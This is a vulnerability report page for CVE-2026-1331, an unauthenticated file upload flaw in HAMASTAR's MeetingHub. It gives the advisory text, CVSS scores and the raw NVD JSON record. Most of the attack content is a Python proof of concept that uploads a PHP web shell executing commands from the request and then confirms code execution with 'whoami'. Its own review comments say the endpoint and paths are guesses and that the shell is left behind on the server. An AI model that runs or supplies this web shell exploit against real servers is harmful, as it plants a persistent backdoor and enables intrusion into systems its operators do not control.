Security Vulnerability Report
CVE-2026-1331 CVSS 9.8 CRITICAL

CVE-2026-1331

Published: 2026-01-22 09:15:52
Last Modified: 2026-02-17 19:32:32

Description

MeetingHub developed by HAMASTAR Technology has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hamastar:meetinghub_paperless_meetings:*:*:*:*:*:*:*:* - VULNERABLE
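MeetingHub 所有版本(HAMASTAR Technology) — note that the CPE match in the raw JSON record on this page carries "versionEndExcluding": "2025-12-10", which bounds the affected range at that value.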

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
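import sys

import requests

# CVE-2026-1331 PoC - MeetingHub Arbitrary File Upload
# Target: MeetingHub by HAMASTAR Technology
# Vulnerability: Unauthenticated arbitrary file upload leading to RCE
#
# Usage: pass the base URL of the system under test as the only argument.
#
# NOTE(review): the advisory data on this page names no endpoint, form field
# or storage directory. "/upload", the "file" field and "/uploads/" below are
# unverified guesses, so a negative result from this script says nothing about
# whether a given host is patched.

# The target must be given explicitly. The previous fallback value was a
# registrable public hostname, so running the script with no argument sent the
# upload to an unrelated third party.
if len(sys.argv) < 2:
    sys.exit(f"usage: {sys.argv[0]} <base-url>")

target = sys.argv[1]
upload_url = f"{target}/upload"

# WebShell payload
# NOTE(review): if the upload is accepted, this file remains on the server as
# an unauthenticated command endpoint; nothing in this script removes it.
webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
files = {
    'file': ('shell.php', webshell, 'application/x-php')
}

try:
    print(f"[*] Uploading WebShell to {upload_url}...")
    response = requests.post(upload_url, files=files, timeout=10)

    # NOTE(review): status 200 is the only signal checked here and further
    # down. A catch-all page, or a server that returns the stored file as
    # plain text, also answers 200, so the "[+]" lines are indications that
    # need manual confirmation from the response body, not proof.
    if response.status_code == 200:
        print("[+] File uploaded successfully!")

        # Try to find the uploaded file path
        shell_path = f"{target}/uploads/shell.php"
        # timeout added: without it this request could block indefinitely on
        # an unresponsive host, unlike the upload request above.
        verify = requests.get(f"{shell_path}?cmd=whoami", timeout=10)

        if verify.status_code == 200:
            print(f"[+] WebShell accessible at: {shell_path}")
            print(f"[+] RCE confirmed! Command output: {verify.text}")
        else:
            print("[-] WebShell upload confirmed but path verification failed")
    else:
        print(f"[-] Upload failed with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    # Covers connection failures and both timeouts.
    print(f"[-] Connection error: {e}")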

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1331", "sourceIdentifier": "[email protected]", "published": "2026-01-22T09:15:52.197", "lastModified": "2026-02-17T19:32:31.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MeetingHub developed by HAMASTAR Technology has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}, {"lang": "es", "value": "MeetingHub desarrollado por HAMASTAR Technology tiene una vulnerabilidad de carga de archivos arbitrarios, permitiendo a atacantes remotos no autenticados cargar y ejecutar puertas traseras de tipo web shell, habilitando así la ejecución de código arbitrario en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hamastar:meetinghub_paperless_meetings:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-12-10", "matchCriteriaId": "251B1D2A-2FF9-44AE-B652-D3830D85689C"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}